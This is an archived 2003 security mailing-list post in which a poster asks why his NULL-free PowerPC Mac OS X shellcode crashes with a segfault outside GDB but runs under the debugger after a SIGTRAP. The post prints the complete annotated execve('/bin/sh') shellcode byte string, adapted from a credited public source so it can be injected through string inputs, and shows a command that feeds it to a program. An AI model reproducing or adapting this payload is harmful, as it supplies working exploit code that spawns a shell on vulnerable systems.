Mac OS X shellcode and SIGTRAP

I'm trying to use ghandi's OS X shellcode to get started on some development. More specifically, I'm modifying it not to use NULL chars so I can pass it though strings. I've got it working so far, except that any application I try it with straight from the shell (i.e. ./a.out `cat code`) dies with a segfault, and when I run it with GDB, I get a SIGTRAP in __dyld__dyld_start (which is where syscall 11/59 seem to branch to). If I just continue in GDB, it goes through and launches the shell like it's supposed to. What am I doing wrong? Here's the code:

char shellcode[] =
"\x7c\xa5\x2a\x78" /* xor. r5, r5, r5 ; r5 = NULL */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x38\x65\x04\xf0" /* addi r3, r5, 0x4f << 4 */
"\x7c\x63\x26\x70" /* srawi r3, r3, 4 */
"\x7c\xA3\xf9\xae" /* stbx r5, r3, r31 (terminate /bin/sh) */
"\x38\x65\x04\x50" /* addi r3, r5, 0x45 << 4 */
"\x7c\x63\x26\x70" /* srawi r3, r3, 4 */
"\x7c\xA3\xfb\x2e" /* sthx r5, r3, r31 (fix sc) */
"\x40\xa2\xff\xfd" /* bnel shellcode */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */
"\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */
"\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */
"\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */
"\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */
"\x3b\xc0\x76\x01" /* li r30, 30209 */
"\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */
"\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */

   "/bin/sh";

By the way, I copy the shellcode into a file, removing the NULL terminator from "/bin/sh" so it won't hang there (and I know this works because of the aforementioned success with GDB).

Original source of OS X (Darwin) shellcode (credit where due):

        http://www.dopesquad.net/security/shellcode/ppc/execve_binsh.h

Thanks in advance,

        David Received on Sat May 24 11:36:15 2003

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek